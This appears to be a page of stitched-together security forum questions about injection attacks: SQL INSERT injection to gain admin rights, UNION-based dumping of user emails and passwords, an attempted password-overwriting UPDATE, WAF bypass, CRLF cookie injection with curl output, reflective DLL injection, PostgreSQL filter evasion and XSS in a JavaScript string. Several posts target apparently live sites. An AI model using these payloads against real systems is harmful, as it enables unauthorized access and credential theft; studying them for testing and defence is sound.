How can I carry out SQL insert injection when there’s a select statement beforehand

So here’s the deal. I’ve been working on an SQL injection challenge and here’s what comes up.

There’s a registration page where you input your Username, password and confirm password. It’s vulnerable to INSERT SQL injection, I’m basically trying to insert my own data and make myself and admin (admin=1). However, there is a SELECT statement before the INSERT statement that checks if the username exists in the database. The problem is, if I try inserting data with SQL injection, the SELECT statement will fail and will generate an error, and the INSERT statement will never be executed.

I’ve made an in-a-nutshell PHP code to show you how it works.

<?php     $  username = $  _POST['username'];     $  password = md5($  _POST['password']);      $  sql = mysqli_query("SELECT * FROM users WHERE username = '$  username';");     if(mysqli_num_rows($  sql) > 0 || !$  sql) {         // this code will be run if the username already exists OR an SQL error in the query above.     }     else {         $  sql = mysqli_query("INSERT INTO users (`id`,`username`,`password`,`admin`) VALUES (NULL,'$  username','$  password',0);");     } ?> 

So the thing is, if I tried signing up with the username "admintest','password',1);-- " which should in theory INSERT myself into the database as an admin, here comes the problems.

The problem, is the SELECT query. Watch what happens.

SELECT * FROM users WHERE username = 'admintest','password',1);-- '; 

This of course is a syntax-error, and as we saw by the code I provided above, an IF statement will confirm that the SQL query was a syntax error, and the INSERT statement will NEVER run.

In an ideal world, this should happen in the INSERT statement, which will insert me as an ADMIN.

INSERT INTO users (`id`,`username`,`password`,`admin`) VALUES (NULL,'admintest','password',1);-- ','password',0); 

I’ve tried to work out something that doesn’t generate a syntax error on the SELECT, and also INSERTs the data I want to insert. Would be appreciated if anyone could help out 🙂

SQL Injection Doesn’t Sanitize But Doesn’t Execute Commands

I am currently doing a pentesting on a web application and focusing more on SQL Injection. This company I am pentesting have a functionality in which we are allowed to buy things from the vendors/suppliers registered there. When a product is added to our cart and ‘Checkout’ button is clicked, the web application will then communicate to the backend to create a cart based on specified ‘cart_id’ and INSERT it to the database. I know this is the case since when I tried to resubmit the request to the server the following error is specified:

"SQLIntegrityConstraintViolationException: Duplicate entry 'RANDOM_ALPHANUMERIC_CART_ID' for key 'idx_cart_id'" 

I tried checking for SQL Injection by adding a single quote at the end of the ‘cart_id’ and HTTP 200 is returned along with server response of a new cart_id with the single quote included. Does this mean It is not sanitizing input? I tried inserting other SQL Commands, the server will still return 200 and the commands are being printed out on the server response but not being executed. Is this web app vulnerable to SQLi (blind?)? If not, Is it possible for me to achieve other vuln such as Stored XSS?

Thank you

site does not respond to some sql injection commands [closed]

I work on a target that I know has SQL injection bug, because in this URL:

example.com/aduanawam/laporan/lap_transaksi.php?s_pendaftaran=%27&s_emel=Select+*+form+aduan.emel 

I get this answer

Database Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘Select * form aduan.emel’ ORDER BY transaksi_aduan.no_pendaftaran asc’ at line 11

But some sql commands, like UNION SELECT @@version-- and Union+select+NUll,null-- don’t work!

When I submit them, the server responds with error 500.

Why does this happen? I think it is the firewall, is there any way to bypass it?

Notice: I have tried all the tamper options in sqlmap, but they didn’t work and the server returned: connection timed out to the target URL or proxy

I also tried –tor but it didn’t work.

Where is the problem?

Reflective DLL Injection using mingw compiles with no Errors, But doesn’t work

I’ve been playing around with the Reflective DLL injection code, I can compile the Dll’s in mingw easily and inject them using the original compiled binaries given here. I can also compile the Injector with no Errors, But the injector doesn’t work and gives me this on Each time, on every Process, As Administrator, And using precompiled injection dlls.

[-] Failed to inject the DLL. Error=998 

Due to this I’ve tried switching my compilers (because I thought it may be it’s problem) from Mingw-64 to Mingw to TDM GCC (this one is easy to use, So I’ll keep this one). But it doesn’t work on either of them. I’m not an Msvc guy, I also don’t like Visual Studio. 🙂

Here’s how I’m compiling the injector.

gcc GetProcAddressR.c Inject.c LoadLibraryR.c 

The original code by Stephen fewer does not support mingw. But it’s fork the one that’s used in Meterpreter does. It can be found here, And this is what I’m using. https://github.com/rapid7/ReflectiveDLLInjection

EDIT : I’m on Windows 10 x64. But I also tried on Windows 7 32 bit. Same Error.

Cookie is not being set after CRLF Injection in one domain but set in another domain. How can i bypass/set it?

Ok i am facing a very weird behaviour that sets and doesnt set cookie both. So, first i have found CRLF injection in 2 domains, redacted.de and redacted_another.com. When i go to redacted_another.com vulnerable url, the cookie gets set into firefox-esr. This works in browser. There first vulnerable domain i encountered had this url:

https://www.redacted_another.com/lp/%0ASet-Cookie:%20dipesh=yadav

I can view cookies using developers tool. This is default behaviour as i think. The next domain i encountered had this vulnerable urls but it didnt work in browser 🙁 :

http://www.redacted.de/forum/%0aSet-Cookie:%20dipesh=yadav http://www.redacted.de/sso/registration/account/%3f%0d%0aSet-Cookie:%20dipesh=yadav 

But when i visit this any urls from redacted.de it doest work in browser. Also, both redacted_another.com and redacted.de sets cookie in curl response. This is what it looks like for both redacted but the first one works in browser and second doesnt in browser. Working Curl request:

root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav  HTTP/2 301  date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 185 location: https://www.redacted.com/lp/redirects/?olp=/lp/ set-cookie: dipesh=yadav expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800  HTTP/2 200  date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 1452 vary: Accept-Encoding last-modified: Tue, 04 Feb 2020 15:54:26 GMT etag: "redacted" expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800 access-control-allow-origin: * accept-ranges: bytes 

NOT WORKING REQUEST:

root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz  HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 13 Aug 2020 15:05:04 GMT Content-Type: text/html Content-Length: 162 Location: https://www.redacted.de/sso/registration/account/ Set-Cookie: bugbounty=bugbountyplz Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT Cache-Control: private Age: 0 X-Frame-Options: DENY X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Connection: keep-alive  HTTP/2 200  server: nginx date: Thu, 13 Aug 2020 15:05:05 GMT content-type: text/html; charset=UTF-8 vary: Accept-Encoding access-control-allow-credentials: true access-control-allow-origin: https://www.redacted.de last-modified: Thu, 13 Aug 2020 15:05:05 GMT cache-control: no-cache, private age: 0 strict-transport-security: max-age=15768000 x-frame-options: DENY x-xss-protection: 1; mode=block x-content-type-options: nosniff accept-ranges: bytes  

Can anyone help me with this? Whats the problem that doesnt letme set cookie in redacted.de but i can set cookie in redacted_another.com.

@@ used in an SQL injection

What is he trying to do here?

[06/Aug/2020:11:44:39 +0000] "GET /index.php HTTP/1.1" 200 8271 "@@e0EEY" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" [06/Aug/2020:11:45:12 +0000] "GET /index.php HTTP/1.1" 200 8271 "https://www.google.com/search?hl=en&q=testing" "@@IvWD9" [06/Aug/2020:12:03:37 +0000] "GET / HTTP/1.1" 200 8269 "@@C42ei" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" [06/Aug/2020:12:03:44 +0000] "GET / HTTP/1.1" 200 8269 "@@JgSGH" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" [06/Aug/2020:12:24:07 +0000] "GET /catalog HTTP/1.1" 200 8253 "https://www.google.com/search?hl=en&q=testing" "@@wgWnB" [06/Aug/2020:12:25:52 +0000] "GET /@@pDxCh/uploads/css/styles.css HTTP/1.1" 404 3785 "https://example.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 

I understand these must be some kind of (undefined?) SQL variables. All I could find was mostly @@version, but no arbitrary variables. Is he trying to provoke the error message output?

Is it safe for me to block all requests containing @@ on the web server level? (I can’t foresee 99% of legit users having it in the request, cookies or headers, but I may be wrong.)

SQL Injection update query

I have a sqli and i can dump data from the DB with the query below func=REC&lastid=7491&start=3&uid=56+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(uid,':',email,':',password) FROM user WHERE uid=56; --&token=6eadee0862e6fe05d588cb29c416d9

How can i add an update query to change the password? I’ve tried the query below but it did’t work

func=REC&lastid=7491&start=3&uid=56+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,UPDATE users SET password='xxxxxxx'; --&token=6eadee0862e6fe05d588cb29c416d9 

PostgreSQL injection with basic sanitization

I’m trying to figure out if an SQLi for the following PostgreSQL/Java code exists.

public void availableItems(String name) {   return this.query("SELECT * FROM items WHERE name='"+name+"'"); } 

Assuming that in the name is sanitizing space, apostrophe and semicolon. Is it possible to make a SQLi work with this restrictions? my gut feeling tell me that I could but I’m a bit lost.

XSS injection into javascript string

Is XSS attack possible in this scenario? As you can see I am able to inject JS by not properly escaped backslash.

 <script type="text/javascript">(function () { random.random(); random.random.random( 'injected\'-alert()-//, 'fulltext-search'); })(); </script> 

in example above I am trying to execute alert box with my injected JS, however I am making some mistake.

< > ; characters cannot be used.